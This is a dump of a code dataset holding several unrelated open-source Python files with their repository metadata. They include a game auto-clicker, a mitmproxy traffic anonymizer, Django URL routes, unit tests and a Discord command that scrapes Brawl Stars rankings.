seq_id
stringlengths
4
11
text
stringlengths
113
2.92M
repo_name
stringlengths
4
125
sub_path
stringlengths
3
214
file_name
stringlengths
3
160
file_ext
stringclasses
18 values
file_size_in_byte
int64
113
2.92M
program_lang
stringclasses
1 value
lang
stringclasses
93 values
doc_type
stringclasses
1 value
stars
int64
0
179k
dataset
stringclasses
3 values
pt
stringclasses
78 values
22011657649
import time
from fgo.common import *
from fgo.管理室 import 随便选任务
from PIL import ImageGrab
from fgo.model import stable_predict
import numpy as np


def 使用小技能(英灵位=0, 技能位=0):
    """Click a servant skill button, confirm the target dialog, then dismiss it.

    英灵位: servant slot (0-2); 技能位: skill slot (0-2).
    Returns a composed action object (the MoveTo/click/Wait DSL from fgo.common).
    """
    def 决定():
        def 取消():
            return MoveTo(1110, 185) + click()
        return MoveTo(875, 429) + click() + Wait(Exact(0.90)) + 取消()
    init_x = 75
    y = 580
    # Servants are 310 px apart; a servant's three skills are 90 px apart.
    x = init_x + 英灵位 * 310 + 90 * 技能位
    return MoveTo(x, y) + click() + 决定()


def 普攻(slot=0):
    """Click one of the five normal attack cards (slot 0-4)."""
    init_x = 150
    delta_x = 257
    y = 490
    return MoveTo(init_x + delta_x * slot, y) + click()


def 宝具(英灵位=0):
    """Click the Noble Phantasm card of the given servant (0-2)."""
    init_x = 480
    delta_x = 230
    y = 120
    return MoveTo(init_x + delta_x * 英灵位, y) + click()


随机小技能 = []


def attack(要使用小技能=True):
    """Compose one full attack turn.

    Optionally opens the card-selection phase (the big attack button),
    fires all three Noble Phantasms, then plays 3 randomly chosen attack
    cards and waits for the animation to finish.
    """
    ret = Wait(Range(0.1, 0.2))
    if 要使用小技能:
        # ret += MoveTo(0, 0)
        # random.shuffle(随机小技能)
        # if not 随机小技能:
        #     随机小技能.extend([(i, j) for i in range(3) for j in range(3)])
        # i, j = 随机小技能.pop()
        # ret += 使用小技能(i, j)
        ret += MoveTo(1132, 608) + click()
    ret += Wait(Exact(1.5))  # wait a moment, otherwise the first NP cannot be cast
    ret += reduce(Compose, (宝具(i) for i in range(3)))
    l = [(普攻, i) for i in range(5)]
    random.shuffle(l)
    l = map(lambda a: a[0](a[1]), l[:3])
    ret += reduce(Compose, l)
    ret += Wait(Exact(7.5))
    return ret


def 贪玩():
    """Main auto-play loop: classify the current screen via stable_predict()
    and dispatch to the matching handler, forever."""
    def 接任务(ctx):
        fix_dpi(Wait(Exact(5)) + 随便选任务() + Wait(Exact(12))).eval(ctx)

    def 战斗(ctx):
        fix_dpi(attack()).eval(ctx)

    def 直接选牌(ctx):
        # BUG FIX: this previously passed 使用小技能=False, but attack()'s
        # parameter is named 要使用小技能 — the call raised TypeError.
        fix_dpi(attack(要使用小技能=False)).eval(ctx)

    def 结束战斗(ctx):
        下一步按钮 = (1118, 679)
        ret = MoveTo(*下一步按钮) + click()
        ret += Wait(Exact(3.0))
        fix_dpi(ret).eval(ctx)

    def 取消释放界面(ctx):
        ret = Wait(Range(0.5, 1.0))
        ret += MoveTo(1145, 260)
        ret += Wait(Range(0.2, 0.3))
        ret += click()
        fix_dpi(ret).eval(ctx)

    def 不是很懂(ctx):
        # Unknown/transitional screen: just wait briefly.
        Wait(Range(0.5, 1.0)).eval(ctx)

    cases = {
        'not_battle': 接任务,
        'battle_ending': 结束战斗,
        'release': 取消释放界面,
        'battle.perform.all': 战斗,
        'battle.perform.select': 直接选牌,
        'battle.wait': 不是很懂,
    }

    def switch(ctx):
        kind = stable_predict()
        cases[kind](ctx)

    body = Function(switch).eval
    return Loop(Function(lambda _: True), Function(lambda ctx: body(ctx)))
thautwarm/do-you-like-wan-you-si
fgo/战斗.py
战斗.py
py
2,638
python
en
code
11
github-code
36
43587658067
import json as _json
import re as _re
from typing import List as _List

from mitmproxy.http import HTTPFlow as _HTTPFlow
from mitmproxy.io import FlowReader as _FlowReader
from mitmproxy.io import FlowWriter as _FlowWriter
from mitmproxy.io import tnetstring as _tnetstring

from . import utils as _utils


# ---------- Constants ----------

__ENTITY_PROPERTY_NAMES = [
    'accesstoken',
    'advertisingkey',
    'attackingshipxml',
    'authenticationtype',
    'battleid',
    'defendingshipxml',
    'devicekey',
    'email',
    'emailverificationstatus',
    'facebooktoken',
    'facebooktokenexpirydate',
    'gamecentername',
    'gamecenterfriendcount',
    'googleplayaccesstokenexpirydate',
    'refreshtoken',
    'steamid',
]

__QUERY_PARAM_NAMES = [
    'accesstoken',
    'advertisingkey',
    'battleid',
    'checksum',
    'devicekey',
    'email',
    'facebooktoken',
    'gamecentername',
    'password',
    'refreshtoken',
    'steamid',
    'ticket',
]

__RX_PROPERTIES: _re.Pattern = _re.compile(
    '( (' + '|'.join(__ENTITY_PROPERTY_NAMES) + ')="(.*?)")',
    _re.IGNORECASE | _re.MULTILINE)


# ---------- Functions ----------

def _mask_value(value: str) -> str:
    """Mask a sensitive value while preserving its length.

    Numeric values become '0' * len, everything else 'x' * len, so the
    anonymized message keeps a realistic size.
    """
    try:
        int(value)
        return '0' * len(value)
    except (TypeError, ValueError):  # was a bare except: — narrowed
        return 'x' * len(value)


def anonymize_flow(flow: _HTTPFlow) -> _HTTPFlow:
    """Strip personally identifying data from a single HTTP flow in place.

    Masks sensitive URL query parameters, request-body parameters (JSON
    object or urlencoded string) and sensitive XML attributes in the
    response body. Returns the (mutated) flow.
    """
    # Drop the recorded socket address.
    flow.server_conn.sockname = (None, None)

    # URL query parameters.
    for query_param_name, query_param_value in flow.request.query.items():
        if query_param_name.lower() in __QUERY_PARAM_NAMES and query_param_value:
            flow.request.query[query_param_name] = _mask_value(query_param_value)

    # Request body: either a JSON object or an urlencoded parameter string.
    if flow.request.content:
        request_content = flow.request.content.decode('utf-8')
        try:
            request_content_dict = _json.loads(request_content)
        except ValueError:  # includes json.JSONDecodeError
            request_content_dict = None
        if isinstance(request_content_dict, dict):
            # Guard against JSON that parses but is not an object (e.g. a
            # list), which previously crashed on .items().
            for query_param_name, query_param_value in request_content_dict.items():
                if query_param_name.lower() in __QUERY_PARAM_NAMES and query_param_value:
                    request_content_dict[query_param_name] = _mask_value(query_param_value)
            request_content = _json.dumps(request_content_dict)
        elif '=' in request_content:
            # Most likely a query-parameter string.
            masked = {}
            for query_param in request_content.split('&'):
                split_query_param = query_param.split('=')
                if len(split_query_param) == 2:
                    # Ignore malformed query parameters or strings that
                    # aren't query parameters.
                    query_param_name, query_param_value = split_query_param
                    if query_param_name.lower() in __QUERY_PARAM_NAMES and query_param_value:
                        query_param_value = _mask_value(query_param_value)
                    masked[query_param_name] = query_param_value
            request_content = '&'.join('='.join((key, value)) for key, value in masked.items())
        flow.request.content = request_content.encode('utf-8')

    # Response body: mask sensitive XML entity attributes. Guard against a
    # missing response (flow.response may be None for aborted flows).
    if flow.response is not None and flow.response.content:
        response_content = flow.response.content.decode('utf-8')
        for match in __RX_PROPERTIES.finditer(response_content):
            matched_string, property_name, property_value = match.groups()
            try:
                int(property_value)
                property_value = '0' * len(property_value)
            except (TypeError, ValueError):
                try:
                    _utils.parse_pss_datetime(property_value)
                    # Timestamps are replaced by a fixed, obviously fake date.
                    property_value = '2016-01-06T00:00:00'
                except Exception:
                    property_value = 'x' * len(property_value)
            response_content = response_content.replace(
                matched_string, f' {property_name}="{property_value}"')
        flow.response.content = response_content.encode('utf-8')

    return flow


def anynomize_flows(file_path: str) -> _List[_HTTPFlow]:
    """Read a mitmproxy capture file and return its flows, anonymized.

    NOTE: the misspelled name is kept for backwards compatibility;
    prefer the `anonymize_flows` alias below.
    """
    with open(file_path, 'rb') as fp:
        flow_reader: _FlowReader = _FlowReader(fp)
        flows = [anonymize_flow(flow) for flow in flow_reader.stream()]
    return flows


# Correctly-spelled alias for the (typo'd) public function above.
anonymize_flows = anynomize_flows


def store_flows(file_path: str, flows: _List[_HTTPFlow]) -> None:
    """Write *flows* to *file_path* in mitmproxy's capture format."""
    with open(file_path, 'wb') as fp:
        flow_writer: _FlowWriter = _FlowWriter(fp)
        for flow in flows:
            flow_writer.add(flow)
PSS-Tools-Development/pss-api-parser
src/anonymize.py
anonymize.py
py
5,070
python
en
code
4
github-code
36
36304843373
Import("env")  # PlatformIO/SCons construction environment


def get_build_flag_value(flag_name):
    """Return the value of a ``-D NAME=VALUE`` CPPDEFINES build flag.

    Value-less defines are parsed by SCons as plain strings and skipped;
    only ``[name, value]`` pairs are considered. Returns an empty string
    when the flag is missing (the original crashed on ``None.strip``).
    """
    build_flags = env.ParseFlags(env['BUILD_FLAGS'])
    flags_with_value_list = [build_flag
                             for build_flag in build_flags.get('CPPDEFINES')
                             if isinstance(build_flag, list)]
    defines = {k: v for (k, v) in flags_with_value_list}
    value = defines.get(flag_name)
    return value.strip('"') if value is not None else ''


# Name the firmware binary PROTOCOL_board_PROTOCOLVERSION.
# (Renamed from `str`, which shadowed the builtin.)
prog_name = "%s_%s_%s" % (get_build_flag_value("PROTOCOL"),
                          env.GetProjectOption("board"),
                          get_build_flag_value("PROTOCOL_VERSION"))
env.Replace(PROGNAME=prog_name)
Georgegipa/UKP
scripts/rename_bin_file.py
rename_bin_file.py
py
475
python
en
code
0
github-code
36
33914103336
import os
import unittest
from unittest import mock

from imageops.server import Server
from imageops.utils import Utils


class ServerCheckTest(unittest.TestCase):
    """
    Unit Test Cases about Server Module
    """

    def setUp(self):
        # Point HOME / TMP_PATH / IMAGE_PATH at fixture directories next to
        # this test file so Server() never touches real system paths.
        file_path = os.path.abspath(os.path.dirname(__file__))
        os.environ['HOME'] = os.path.join(file_path, 'home')
        os.environ['TMP_PATH'] = os.path.join(file_path, 'tmp')
        os.environ['IMAGE_PATH'] = os.path.join(file_path, 'vmImages')
        self.test_server = Server('123-456-789')
        self.input_image = os.path.join(os.getenv('IMAGE_PATH'), 'input_image_test_file.img')
        # Paths the server writes its per-request check record to.
        self.check_record_path = os.path.join(self.test_server.tmp_path, self.test_server.request_id)
        self.check_record_file = os.path.join(self.check_record_path, self.test_server.check_record_file)

    def tearDown(self):
        # Clean up anything a test created; rmdir only removes empty
        # directories, so the file must be removed first.
        if os.path.isfile(self.check_record_file):
            os.remove(self.check_record_file)
        if os.path.exists(self.check_record_path):
            os.rmdir(self.check_record_path)
        if os.path.exists(self.test_server.tmp_path):
            os.rmdir(self.test_server.tmp_path)

    def test_server_init_without_request_id(self):
        # Server() must reject a missing request_id and log the reason.
        logger_mock = mock.Mock()
        Server.logger = logger_mock
        self.assertRaises(ValueError, Server)
        Server.logger.error.assert_called_with('Lacking request_id.')

    def test_server_init_without_tmp_env(self):
        # Missing TMP_PATH env var is a hard error at construction time.
        logger_mock = mock.Mock()
        Server.logger = logger_mock
        os.environ.pop('TMP_PATH')
        self.assertRaises(ValueError, Server, 'abc-xyz')
        Server.logger.error.assert_called_with('No TMP_PATH found in env.')

    def test_server_init_without_image_env(self):
        # Missing IMAGE_PATH env var is likewise a hard error.
        logger_mock = mock.Mock()
        Server.logger = logger_mock
        os.environ.pop('IMAGE_PATH')
        self.assertRaises(ValueError, Server, 'abc-xyz')
        Server.logger.error.assert_called_with('No IMAGE_PATH found in env.')

    @mock.patch("imageops.utils.Utils.check_cmd_exec")
    @mock.patch("imageops.utils.Utils.get_md5_checksum")
    def test_check_vm_image_without_exception(self, get_md5_checksum, check_cmd_exec):
        # Happy path: qemu-img info succeeds -> status 0, "In Progress".
        check_cmd_exec.return_value = {"format": "qcow2", "virtual_size": 40.0}
        get_md5_checksum.return_value = '123'
        status, msg = self.test_server.check_vm_image(self.input_image)
        self.assertEqual(0, status)
        self.assertEqual('Check In Progress', msg)

    def test_check_vm_image_with_no_input_image(self):
        self.assertRaises(ValueError, self.test_server.check_vm_image)

    def test_check_vm_image_with_nonexist_input_image(self):
        self.assertRaises(ValueError, self.test_server.check_vm_image, 'nonexosts.img')

    @mock.patch("imageops.utils.Utils.check_cmd_exec")
    @mock.patch("imageops.utils.Utils.get_md5_checksum")
    def test_check_vm_image_failed(self, get_md5_checksum, check_cmd_exec):
        # Any exception from the check command maps to status 1, "Check Failed".
        check_cmd_exec.side_effect = Exception
        get_md5_checksum.return_value = '123'
        status, msg = self.test_server.check_vm_image(self.input_image)
        self.assertEqual(1, status)
        self.assertEqual('Check Failed', msg)
EdgeGallery/toolchain
imageops/imageops/tests/test_server_check.py
test_server_check.py
py
3,281
python
en
code
19
github-code
36
70951081705
import numpy as np
import unittest

import javabridge as J
import imagej.imageplus as I
import imagej.imageprocessor as IP


class TestImageProcessor(unittest.TestCase):
    # Tests for the numpy <-> ImageJ ImageProcessor bridge.

    def setUp(self):
        # Each test thread must be attached to the JVM before use.
        J.attach()

    def tearDown(self):
        J.detach()

    def test_01_01_get_image(self):
        # Load an example image and extract its pixels from the ImageJ
        # processor; this only checks the call chain completes.
        from cellprofiler.modules.tests import maybe_download_example_image
        folder = "ExampleCometAssay"
        fn = "CometTails.tif"
        file_name = maybe_download_example_image([folder], fn)
        imageplus_obj = I.load_imageplus(file_name)
        pixels = IP.get_image(imageplus_obj.getProcessor())
        pass

    def test_01_02_make_image_processor(self):
        # Round trip: numpy array -> ImageProcessor -> numpy array must
        # preserve shape and every pixel value exactly (float32 both ways).
        np.random.seed(102)
        image = np.random.uniform(size=(30, 50)).astype(np.float32)
        image_processor = IP.make_image_processor(image)
        result = IP.get_image(image_processor)
        self.assertEqual(image.shape[0], result.shape[0])
        self.assertEqual(image.shape[1], result.shape[1])
        self.assertTrue(np.all(result == image))
AnneCarpenter/python-imagej
tests/test_imageprocessor.py
test_imageprocessor.py
py
1,035
python
en
code
0
github-code
36
21323942849
from turtle import Turtle

ALIGNMENT = "center"
FONTS = {
    "default": ("Courier", 15, "normal"),
    "big": ("Courier", 25, "normal"),
}


class Scoreboard(Turtle):
    """Invisible turtle that renders the current and high score for Snake.

    The high score is persisted in ``data.txt`` next to the game.
    """

    def __init__(self):
        super().__init__(visible=False)
        self.score = 0
        # Read the persisted high score with a context manager — the
        # original used bare open().read() and leaked the file handle.
        with open("data.txt") as data_file:
            self.high_score = int(data_file.read())
        self.penup()
        self.color("#DCDCDC")  # a redundant earlier color("white") was removed
        self.update_scoreboard()

    def update_scoreboard(self):
        """Redraw the score and high-score lines at the top of the screen."""
        self.clear()
        self.goto(0, 265)
        self.write(f"Score: {self.score}", False, ALIGNMENT, FONTS["default"])
        self.goto(0, 240)
        self.write(f"High Score: {self.high_score}", False, ALIGNMENT, FONTS["default"])

    def restart(self):
        """Persist a new high score if it was beaten, then reset the score."""
        if self.score > self.high_score:
            self.high_score = self.score  # no need to re-read the file
            with open("data.txt", mode="w") as data_file:
                data_file.write(str(self.score))
        self.score = 0
        self.update_scoreboard()

    def game_over(self):
        """Show the game-over banner and retry hint."""
        self.goto(0, 0)
        self.write("GAME OVER", False, ALIGNMENT, FONTS["big"])
        self.goto(0, -30)
        self.write("Press 'A' to retry.", False, ALIGNMENT, FONTS["default"])

    def increase_score(self):
        """Add one point and refresh the display."""
        self.score += 1
        self.update_scoreboard()
happy09123/Snake-Game
scoreboard.py
scoreboard.py
py
1,290
python
en
code
0
github-code
36
15640198972
from django.conf.urls import url, include
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from . import views

# Root URL configuration: static pages, the Django admin, auth, and one
# namespaced include per app. Order matters — Django uses the first match.
urlpatterns = [
    url(r"^$", views.HomePage.as_view(), name="home"),
    url(r"^index/$", views.TestPage.as_view(), name="test"),
    url(r"^thanks/$", views.ThanksPage.as_view(), name="thanks"),
    url(r'^admin/', admin.site.urls, name='admin'),
    url(r"^accounts/", include("accounts.urls", namespace="accounts")),
    # Fallback: built-in auth views (login/logout/password reset) for any
    # accounts/ URL the app's own urls.py does not define.
    url(r"^accounts/", include("django.contrib.auth.urls")),
    url(r"^groups/", include("groups.urls", namespace="groups")),
    url(r'^company/', include('company.urls', namespace='company')),
    url(r'^project/', include('project.urls', namespace='project')),
    url(r'^sprint/', include('sprint.urls', namespace='sprint')),
    url(r'^task/', include('task.urls', namespace='task')),
    url(r'^log/', include('log.urls', namespace='log')),
    url(r'^todo/', include('todo.urls', namespace='todo')),
    url(r'^meeting/', include('meeting.urls', namespace='meeting')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# static() serves user-uploaded media in development only.
itzikorfa/SE-Lite-Scrum
SE_Project_VerX/urls.py
urls.py
py
1,153
python
en
code
0
github-code
36
72545214823
import hashlib


class Codec:
    """TinyURL-style codec (LeetCode 535), ported from Python 2 to Python 3.

    Fixes: ``hashlib.md5`` needs bytes, ``dict.has_key`` no longer exists,
    and ``/`` is true division in Python 3 (``divmod``/``//`` is required
    for base-62 digit extraction).
    """

    def __init__(self):
        self.url_list = []        # id -> original URL
        self.hash_map = {}        # md5(url) -> id, dedupes repeat encodes
        self.current_id = 0
        self.alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

    def encode(self, longUrl):
        """Encode *longUrl* to a 5-character base-62 short URL.

        Encoding the same URL twice returns the same short URL.
        """
        shortUrl = 'http://tinyurl.com/'
        digest = hashlib.md5(longUrl.encode('utf-8')).hexdigest()
        if digest in self.hash_map:
            url_id = self.hash_map[digest]
        else:
            self.url_list.append(longUrl)
            url_id = self.current_id
            self.hash_map[digest] = url_id
            self.current_id += 1
        # Emit 5 base-62 digits, least significant first (ids < 62**5).
        for _ in range(5):
            url_id, p = divmod(url_id, 62)
            shortUrl += self.alphabet[p]
        return shortUrl

    def decode(self, shortUrl):
        """Decode a short URL back to the original long URL."""
        idUrl = shortUrl[19:]  # strip the 19-char 'http://tinyurl.com/' prefix
        url_id = 0
        weight = 1
        for ch in idUrl:
            url_id += self.alphabet.find(ch) * weight
            weight *= 62
        return self.url_list[url_id]
zhongchong/Leetcode
Leetcode/535.py
535.py
py
1,052
python
en
code
0
github-code
36
8161754177
import multiprocessing
import time


def pro1(q):
    """Producer: put 100 stringified integers into the queue."""
    for i in range(100):
        q.put(str(i))
        time.sleep(0.1)


def pro2(q):
    """Consumer: take 100 items off the queue, printing each one."""
    for i in range(100):
        item = q.get()
        print(item)
        # JoinableQueue: mark the item as processed so queue.join() can return.
        q.task_done()


if __name__ == '__main__':
    queue = multiprocessing.JoinableQueue()
    p1 = multiprocessing.Process(target=pro1, args=(queue,))
    p2 = multiprocessing.Process(target=pro2, args=(queue,))
    p1.start()
    p2.start()
    # FIX: actually wait for both workers, then for every queued item to be
    # marked done — without join() the JoinableQueue served no purpose.
    p1.join()
    p2.join()
    queue.join()
weatherbetter/levelup-python
multi_process/multiprocess_JoinableQueue.py
multiprocess_JoinableQueue.py
py
540
python
en
code
0
github-code
36
29648508373
#! /usr/bin/env python3
# Author: Mohit Saini (mohitsaini1196@gmail.com)

"""
The entry point of DepG library. Read the `README.md` for more details.
"""

# pylint: disable=missing-function-docstring
# pylint: disable=invalid-name
# pylint: disable=missing-class-docstring

import os

from . import target_graph_builder
from .default_configs import getDefaultConfigs
from . import merge_build_file
from . import parser
from . import common


def getHeaderPrefixesMap(third_p_build_files):
    """ A map from header prefix to target. It's used for detecting the
    dependency target. eg: if a program includes the header "glog/logging.h",
    it means we can say this program depends on the glog target. In this
    case the prefix "glog/" is present in header prefix map with glog-target
    as corresponding value.
    Currently we populate the header prefix map for third-party libraries.
    Note: All the third-party targets are manually declared. """
    output = {}
    for build_file in third_p_build_files:
        # A BUILD file at the repo root has an empty dirname; treat it as ".".
        directory = os.path.dirname(build_file) or "."
        targets_map = parser.readBuildFile(build_file, directory)
        for tname, target in targets_map.items():
            for i in target.get("header_prefix", []):
                output[i] = f"{directory}/{tname}"
    return output


def validateWorkingDirectory(source_directory):
    # All relative paths in the configs assume the CWD is the source root.
    assert source_directory == os.getcwd(), \
        "Current directory should be source_directory."


def preprocessConfig(configs):
    """Derive computed config fields in place and return the configs."""
    configs.CPP_EXTENSIONS = configs.CPP_HEADER_EXTENSIONS + configs.CPP_SOURCE_EXTENSIONS
    if configs.HEADER_PREFIXES_MAP is None:
        configs.HEADER_PREFIXES_MAP = getHeaderPrefixesMap(configs.THIRD_PARTY_TARGET_BUILD_FILES)
    # Cache key: changes whenever any third-party BUILD file changes.
    configs.DEPG_DEPS_CACHE_CHECKSUM = ":".join(common.getFileCheckSum(x)
                                                for x in configs.THIRD_PARTY_TARGET_BUILD_FILES)
    top_dirs = set(common.toRelativePaths(configs.TOP_DIRECTORY_LIST))
    # Everything in the CWD outside the declared top directories is ignored.
    configs.IGNORED_PATHS |= set(i for i in os.listdir(".") if i not in top_dirs)
    return configs


class Depg:
    # Facade tying together the target-graph builder and BUILD-file merger.

    def __init__(self, source_directory, configs):
        validateWorkingDirectory(source_directory)
        self.configs = preprocessConfig(configs)
        self.deps_parser = target_graph_builder.TargetGraphBuilder(self.configs)

    def autoGenBuildFileMap(self, paths):
        """Map changed paths -> affected targets -> per-BUILD-file targets."""
        target_names = target_graph_builder.changedPathsToTargetNames(
            paths, self.configs)
        targets_map = self.deps_parser.getDeps(target_names)
        build_files_map = merge_build_file.depgTargetsToLocalTargets(targets_map)
        return build_files_map

    def regenerateBuildFiles(self, paths, output_directory="."):
        """Regenerate the BUILD files affected by *paths* under *output_directory*."""
        build_files_map = self.autoGenBuildFileMap(paths)
        merge_build_file.regenerateBuildFiles(build_files_map,
                                              output_directory=output_directory,
                                              force_override_build_files=self.configs.force_override_build_files)
mohitmv/depg
depg_lib_main.py
depg_lib_main.py
py
2,978
python
en
code
0
github-code
36
19279680101
import datetime
import os

import tensorflow as tf
import numpy as np


class Runner(object):
    # Drives agent/environment interaction for training or evaluation.

    def __init__(self, agent, env, train, load_path):
        self.agent = agent
        self.env = env
        self.train = train  # True: train the agent, False: load a trained agent
        self.episode = 1
        self.last_10_ep_rewards = []
        # One TensorBoard log directory per run, named by timestamp,
        # mode (train/run) and agent class.
        self.path = './graphs/' + datetime.datetime.now().strftime("%y%m%d_%H%M") \
            + ('_train_' if self.train else 'run_') \
            + type(agent).__name__
        self.writer = tf.summary.create_file_writer(self.path)
        # Load a previously trained model when only evaluating.
        if not self.train and load_path is not None and os.path.isdir(load_path):
            self.agent.load_model(load_path)

    def summarize(self):
        """Record per-episode values (TensorBoard logging currently disabled)."""
        '''self.writer.add_summary(tf.Summary(
            value=[tf.Summary.Value(tag='Score per Episode', simple_value=self.score)]),
            self.episode
        )
        if self.train and self.episode % 10 == 0:
            self.agent.save_model(self.path)
            try:
                self.agent.update_target_model() # No se que hace
            except AttributeError:
                ...
        '''
        self.episode += 1

    def run(self, episodes):
        """Train/evaluate the agent for the given number of episodes."""
        while self.episode <= episodes:
            obs = self.env.reset()
            dist = 0
            new_dist = 0
            self.score = 0
            done = False
            act = 0
            # Cap each episode at 150 agent steps.
            while act < 150:
                if obs.last():
                    break
                state, pos_marine, dist = self.agent.state_marine(obs)
                if obs.first():
                    # First frame of the episode: select the army.
                    action = self.agent._SELECT_ARMY
                    act_value = 0
                else:
                    act_value, action = self.agent.step(state, pos_marine)
                obs = self.env.step(action)
                next_state, pos_marine, new_dist = self.agent.state_marine(obs)
                reward = obs.reward
                done = reward > 0
                # Reward shaping: add the change in distance to the target.
                reward += dist - new_dist
                self.score += reward
                # Store the agent's experience at every time step.
                self.agent.buffer.add(state, act_value, reward, next_state, done)
                state = next_state
                self.agent.cur_frame += 1
                # Copy the main network weights into the target network.
                if self.agent.cur_frame % self.agent.update_target == 0:
                    self.agent.copy_weights(self.agent.main_nn, self.agent.target_nn)
                # Train the neural network once the replay buffer is warm.
                if len(self.agent.buffer) > self.agent.batch_size:
                    states, actions, rewards, next_states, dones = self.agent.buffer.sample(self.agent.batch_size)
                    loss = self.agent.train_step(states, actions, rewards, next_states, dones)
                act += 1
            # Epsilon decay.
            if self.episode < self.agent.num_episodes:
                self.agent.decrease_epsilon()
            # Keep the rewards of the last 10 episodes (sliding window).
            if len(self.last_10_ep_rewards) == 10:
                self.last_10_ep_rewards = self.last_10_ep_rewards[1:]
            self.last_10_ep_rewards.append(self.score)
            # Report mean reward every 10 episodes.
            if self.episode % 10 == 0:
                #aux_reward = agent.explotation(iteraciones)
                mean_rewards = np.mean(self.last_10_ep_rewards)
                print(f'Episode {self.episode}/{self.agent.num_episodes}, Epsilon: {self.agent.epsilon:.3f}, '\
                      f'Reward in last 100 episodes: {mean_rewards:.2f}')
                #episodes.append(episode)
                #eps_history.append(agent.epsilon)
                #prom_rewards_greedy.append(aux_reward)
                #last_100_mean_rewards.append(mean_rewards)
            self.summarize()
ericPrimelles/RLProject
runner.py
runner.py
py
4,209
python
en
code
0
github-code
36
38799425699
import discord
import bdg
import enum
import requests
import bs4
import datetime


class BrawlModes(enum.Enum):
    # Values match the element-id suffixes used on brawlace.com.
    BRAWLBALL = "brawlBall"
    SOLOSHOWDOWN = "soloShowdown"
    DUOSHOWDOWN = "duoShowdown"
    GEMGRAB = "gemGrab"
    BOUNTY = "bounty"
    HOTZONE = "hotZone"
    KNOCKOUT = "knockout"
    HEIST = "heist"
    SIEGE = "siege"


# Portuguese display name for each game mode.
names = {
    BrawlModes.BRAWLBALL: "FUTE-BRAWL",
    BrawlModes.SOLOSHOWDOWN: "COMBATE SOLO",
    BrawlModes.DUOSHOWDOWN: "COMBATE DUPLO",
    BrawlModes.GEMGRAB: "PIQUE-GEMA",
    BrawlModes.BOUNTY: "CAÇA ESTRELAS",
    BrawlModes.HOTZONE: "ZONA ESTRATÉGICA",
    BrawlModes.KNOCKOUT: "NOCAUTE",
    BrawlModes.HEIST: "ROUBO",
    BrawlModes.SIEGE: "ENCURRALADO"
}

# Embed accent color per game mode.
colors = {
    BrawlModes.BRAWLBALL: 0x8CA0DF,
    BrawlModes.SOLOSHOWDOWN: 0x81D621,
    BrawlModes.DUOSHOWDOWN: 0x81D621,
    BrawlModes.GEMGRAB: 0x9B3DF3,
    BrawlModes.BOUNTY: 0x01CFFF,
    BrawlModes.HOTZONE: 0xE33C50,
    BrawlModes.KNOCKOUT: 0xF7831C,
    BrawlModes.HEIST: 0xD65CD3,
    BrawlModes.SIEGE: 0xF04F32
}


class BrawlMetasCommand(discord.app_commands.Command):
    """Slash command that shows the top meta brawlers per game mode,
    scraped from brawlace.com."""

    def __init__(self, bot: bdg.BotDusGuri):
        self.bot = bot
        super().__init__(
            name="brawl_meta",
            description="Mostra uma lista dos brawlers meta de cada modo de jogo",
            callback=self.on_command
        )

    async def on_command(self, i: discord.Interaction, modo: BrawlModes, top: int = 10):
        # Scraping can be slow — defer so the interaction does not time out.
        await i.response.defer(thinking=True)
        data = self.get_metas(modo, top)
        desc = str()
        for brawler in data['brawlers']:
            desc += "{rank}. **{name}** - `{star}%`\n".format(**brawler)
        embed = discord.Embed(
            title=f"Top {top} - {names[modo]}",
            color=colors[modo],
            description=desc
        )
        # Credit the data source (Brawl Ace) as the embed author.
        embed.set_author(
            name="Brawl Ace",
            url="https://brawlace.com/meta",
            icon_url="https://brawlace.com/assets/images/icon.png?v=22.87"
        )
        # Use the game-mode icon as the thumbnail.
        embed.set_thumbnail(url=data['icon'])
        # Legend for the percentage column.
        embed.set_footer(text="(%) Porcentagem de Craque")
        # Timestamp the embed with the source's last-update time.
        embed.timestamp = data['last_update']
        await i.followup.send(embed=embed)

    def get_metas(self, mode: BrawlModes, count: int = 10) -> dict[str, any]:
        """Scrape brawlace.com/meta for the given mode.

        Returns {'icon': url, 'last_update': datetime, 'brawlers': [
        {'rank', 'name', 'star'}, ...]} with at least 3 and at most
        len(table) entries. NOTE(review): tightly coupled to the site's
        current HTML layout — selectors may break if it changes.
        """
        html = bs4.BeautifulSoup(requests.get("https://brawlace.com/meta", cookies={"lang": "pt"}).content, "html.parser")
        div = html.select_one(f"#gameModeData{mode.value}")
        data = {}
        # Game-mode icon.
        data['icon'] = div.select_one("h3 img")['src']
        # Last-update time as published by the site.
        last_update = html.select_one("div.input-group option", selected=True).text
        last_update = datetime.datetime.strptime(last_update, "%Y-%m-%d %H:%M:%S")
        last_update -= datetime.timedelta(hours=7)  # convert from UTC+7 to UTC+0
        data['last_update'] = last_update
        # Ranked brawler rows.
        data['brawlers'] = []
        brawlers = div.select_one(f"table tbody").find_all("tr")
        count = sorted((3, count, len(brawlers)))[1]  # same as clamp(3, count, len)
        for i in range(count):
            info = {}
            brawler = brawlers[i].find_all('td')
            info['rank'] = i + 1
            info['name'] = brawler[1].text
            info['star'] = float(brawler[3].text[0:-2])  # '3.33 %' -> 3.33
            data['brawlers'].append(info)
        return data
DanielKMach/BotDusGuri
src/commands/utilities/brawlmeta.py
brawlmeta.py
py
3,277
python
en
code
1
github-code
36
417814461
import os
from collections import defaultdict


def file_statistics(parent_dir):
    """Count files under *parent_dir*, grouped into size buckets.

    Buckets are keyed by their upper bound in bytes: 100, 1000, 10000,
    and 100000 (the last one holds everything larger than 10000 bytes).
    Only non-empty buckets appear in the result, in ascending key order.
    """
    bucket_counts = defaultdict(int)
    for root, _dirs, names in os.walk(parent_dir):
        for name in names:
            size = os.stat(os.path.join(root, name)).st_size
            if size <= 100:
                bucket = 100
            elif size <= 1000:
                bucket = 1000
            elif size <= 10000:
                bucket = 10000
            else:
                bucket = 100000
            bucket_counts[bucket] += 1
    return {bucket: bucket_counts[bucket] for bucket in sorted(bucket_counts)}


if __name__ == '__main__':
    print(file_statistics('some_data'))
Shorokhov-A/practical_tasks
Shorokhov_Andreiy_dz_7/task_7_4.py
task_7_4.py
py
747
python
en
code
0
github-code
36
16895923091
